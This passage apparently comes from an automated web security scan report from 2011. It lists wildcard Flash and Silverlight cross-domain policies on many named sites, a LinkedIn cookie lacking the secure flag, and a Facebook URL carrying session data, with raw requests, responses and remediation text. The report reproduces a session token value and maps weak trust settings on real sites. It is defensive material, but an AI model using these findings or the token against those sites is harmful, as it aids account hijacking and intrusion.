Accept-Ranges: bytes
ETag: "c3bb41117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.53. http://grfx.cstv.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://grfx.cstv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: grfx.cstv.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1717425046"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Content-Length: 909
Server: lighttpd/1.4.19
Date: Sun, 04 Sep 2011 00:45:18 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.54. http://mi.adinterax.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://mi.adinterax.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mi.adinterax.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 00:59:10 GMT
Content-Length: 708
Content-Type: application/xml
Expires: Tue, 08 Nov 2011 10:18:21 GMT
Last-Modified: Thu, 02 Sep 2010 20:10:03 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com" />
<allow-access-from domain="adinterax.cnet.com.edgesuite.net" />
<allow-access-from domain="adinterax.myspace.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

6.55. http://optimized-by.rubiconproject.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:59 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

6.56. http://rd.meebo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rd.meebo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:10:35 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 91
Last-Modified: Wed, 26 Jan 2011 19:56:05 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*.meebo.com"/>
</cross-domain-policy>

6.57. http://snas.nbcuni.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: snas.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT
ETag: "2c9cd-58b-4979f4b136880"
Accept-Ranges: bytes
Content-Length: 1419
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:36 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*.ivillage.com" /><allow-access-from domain="*.nbbcdev.com" /><allow-access-from domain="*.bravotv.com" /><allow-access-from domain="*.console.net" /><allow-access-from domain="*.digphilly.com"/><allow-access-from domain="*.nbc10rss.com"/><allow-access-from domain="*.nbc10.com"/><allow-access-from domain="*.scifi.com"/><allow-access-from domain="*.weatherplus.com" /><allow-access-from domain="*.nbcuxd.com" /><allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com" /><allow-access-from domain="*.industrynext.com"/><allow-access-from domain="*.nbcuni.com"/><allow-access-from domain="widgets.nbcuni.com"/><allow-access-from domain="*.nbc.com"/><allow-access-from domain="*.thetonightshowwithconan.com"/><allow-access-from domain="*.tonightshowwithconanobrien.com"/><allow-access-from domain="*.thetonightshowwithconanobrien.com"/><allow-access-from domain="*.tonightshow.com" /><allow-access-from domain="*.tonightshowwithconan.com" /><allow-access-from domain="*.latenightwithjimmyfallon.com" /><allow-access-from domain="*.ingaylewetrust.com" /><allow-access-from domain="*.thejaylenoshow.com" /><allow-access-from domain="127.0.0.1"/><allow-access-from domain="localhost"/><allow-access-from domain="*.sudjam.com"/>
...[SNIP]...

6.58. http://syndication.mmismm.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: syndication.mmismm.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:34 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2011 02:20:52 GMT
ETag: "10e-4a8db76d7c900"
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

6.59. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.62.155.33
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.60. http://www.meebo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.meebo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:10:22 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

6.61. http://www.reuters.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:47 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 00:52:47 GMT
browser-expires: Sun, 4 Sep 2011 00:47:47 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 857
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.reutersmedia.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.uk.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oho.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.metacarta.com" secure="false"/>
...[SNIP]...

6.62. http://www.sacbee.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sacbee.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT
ETag: "a12c7f-175-4e49acab"
Server: Apache/1.3.41
Content-Type: application/xml
Cache-Control: max-age=154
Date: Sun, 04 Sep 2011 00:58:05 GMT
Content-Length: 373
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
   "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sacbee.com"/>
   <allow-access-from domain="*.mcclatchyinteractive.com"/>
   <allow-access-from domain="*.vmixcore.com"/>
...[SNIP]...

6.63. http://www.youtube.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Sun, 04 Sep 2011 00:55:45 GMT
Expires: Sun, 04 Sep 2011 00:55:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.64. http://api.twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:53 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:16:53 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.65. http://sales.reuters.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.reuters.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sales.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:41:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 05 Oct 2009 20:10:04 GMT
ETag: "176c414-1aa-47535b304df00"
Accept-Ranges: bytes
Content-Length: 426
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="sales.reuters.com" />
   <allow-access-from domain="in.sales.reuters.com" />
   <allow-access-from domain="cn.sales.reuters.com" />
...[SNIP]...

7. Silverlight cross-domain policy previous next
There are 9 instances of this issue:

http://b.scorecardresearch.com/clientaccesspolicy.xml
http://content.usatoday.com/clientaccesspolicy.xml
http://metrics.sprint.com/clientaccesspolicy.xml
http://nmsacramento.112.2o7.net/clientaccesspolicy.xml
http://pixel.quantserve.com/clientaccesspolicy.xml
http://s0.2mdn.net/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml
http://usatoday1.112.2o7.net/clientaccesspolicy.xml
http://wa.proflowers.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:49:46 GMT
Date: Sun, 04 Sep 2011 00:49:46 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.2. http://content.usatoday.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
<domain uri="*"/>

...[SNIP]...

7.3. http://metrics.sprint.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.4. http://nmsacramento.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nmsacramento.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nmsacramento.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:36 GMT
Server: Omniture DC/2.0.0
xserver: www597
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.5. http://pixel.quantserve.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 01:00:45 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 04 Sep 2011 01:00:45 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>
<resour
...[SNIP]...

7.6. http://s0.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:00:20 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 3106
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:58:36 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:58:36 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.8. http://usatoday1.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usatoday1.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:37 GMT
Server: Omniture DC/2.0.0
xserver: www46
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.9. http://wa.proflowers.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wa.proflowers.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:03 GMT
Server: Omniture DC/2.0.0
xserver: www381
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8. SSL cookie without secure flag set previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpepcYFrtwDfIrhAIVsQxwMUh:1315099155:0c843f0a96a8006c044aa7d63d7ac676a0c1e9e0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:49:14 GMT; Path=/
sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:51:45 GMT;path=/;httponly

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpepcYFrtwDfIrhAIVsQxwMUh:1315099155:0c843f0a96a8006c044aa7d63d7ac676a0c1e9e0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:49:14 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:19:15 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:51:45 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

9. Session token in URL previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df42349018%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df322bc3668%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfda0aaa7%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37a882414%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23cc7f5dc%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&sdk=joey&session_origin=1&session_version=3

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

